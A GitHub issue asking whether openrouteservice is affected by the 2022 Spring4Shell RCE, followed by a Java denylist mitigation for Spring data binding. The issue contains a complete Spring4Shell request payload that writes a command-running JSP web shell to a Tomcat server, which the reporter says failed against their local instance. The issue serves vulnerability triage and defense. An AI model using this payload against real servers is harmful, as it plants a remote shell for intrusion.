
Spring Shell RCE inquiry

Open TheDropZone opened this issue 2 years ago • 0 comments

https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement
https://www.lunasec.io/docs/blog/spring-rce-vulnerabilities/#applying-mitigations

Spring has announced an RCE affecting spring projects with the following stats:

  • JDK 9 or higher
  • Apache Tomcat as the Servlet container
  • Packaged as a traditional WAR (in contrast to a Spring Boot executable jar)
  • spring-webmvc or spring-webflux dependency
  • Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions

Upon checking, through my docker deployment (with :latest), it seems that openrouteservice may be ticking all (or at least a lot) of these boxes. Because of this, I attempted an exploit against my local instance via

POST http://localhost:8082/ors/v2/directions/driving-car
{
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern": "%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di",
    "class.module.classLoader.resources.context.parent.pipeline.first.suffix": ".jsp",
    "class.module.classLoader.resources.context.parent.pipeline.first.directory": "webapps/ROOT",
    "class.module.classLoader.resources.context.parent.pipeline.first.prefix": "shell",
    "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat": "",
    "coordinates": [[-82.590945,35.569088],[-82.539167,35.565559]]
}

In line with identified RCEs (https://github.com/TheGejr/SpringShell/blob/master/exp.py), it does not seem as though the RCE is successful, given that the "class.module.classLoader.resources.context.parent.pipeline.first.pattern" fields are not found.

I also ran the tomcat deployment in debug mode and traced the POST request, but it does not seem that the JSON de-serializer would ever allow for this type of access, as 'AbstractJackson2HttpMessageConverter' simply states that the 'RouteRequest' object does not contain that field.

This leads me to believe that the vulnerability is not valid for the openrouteservice project; however, I wanted to bring it up for further investigation.

Resolution

The official Spring post listed above does note a few solutions, around versions and disabling fields, if in fact the project is vulnerable.

Thanks

TheDropZone avatar Mar 31 '22 17:03 TheDropZone
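The "disabling fields" mitigation that the linked Spring announcement describes for deployments that cannot upgrade right away, written out here as an added example (it is not code from the openrouteservice project, and the package name is assumed): a global ControllerAdvice that adds the class/Class property-path denylist to every WebDataBinder, merging with any denylist a controller already set locally.

```java
package org.example.hardening; // assumed package name for this example

import java.util.Arrays;
import java.util.LinkedHashSet;
import java.util.Set;

import org.springframework.core.Ordered;
import org.springframework.core.annotation.Order;
import org.springframework.web.bind.WebDataBinder;
import org.springframework.web.bind.annotation.ControllerAdvice;
import org.springframework.web.bind.annotation.InitBinder;

/**
 * Global @InitBinder that refuses to bind any request parameter whose
 * property path starts with, or passes through, "class" / "Class".
 * Those are the paths the Spring4Shell payload in the issue above walks
 * (class.module.classLoader...) to reach Tomcat's AccessLogValve.
 *
 * This only governs data binding of request/form parameters into model
 * attributes. A JSON @RequestBody is handled by the Jackson message
 * converter instead and never passes through a WebDataBinder.
 *
 * LOWEST_PRECEDENCE makes this advice run after any controller-local
 * @InitBinder, so a controller that calls setDisallowedFields() itself
 * does not silently replace this denylist with a shorter one.
 */
@ControllerAdvice
@Order(Ordered.LOWEST_PRECEDENCE)
public class BinderControllerAdvice {

    // Patterns use DataBinder's simple wildcard matching ("*" only).
    private static final String[] DENYLIST = {
        "class.*", "Class.*", "*.class.*", "*.Class.*"
    };

    @InitBinder
    public void setDisallowedFields(WebDataBinder binder) {
        // Keep whatever the controller already disallowed, then append ours.
        Set<String> merged = new LinkedHashSet<>();
        String[] existing = binder.getDisallowedFields();
        if (existing != null) {
            merged.addAll(Arrays.asList(existing));
        }
        merged.addAll(Arrays.asList(DENYLIST));
        binder.setDisallowedFields(merged.toArray(new String[0]));
    }
}
```

Upgrading to a fixed Spring Framework release (5.3.18 or 5.2.20, per the announcement) remains the primary fix; the denylist is the announcement's stopgap for deployments that cannot upgrade immediately.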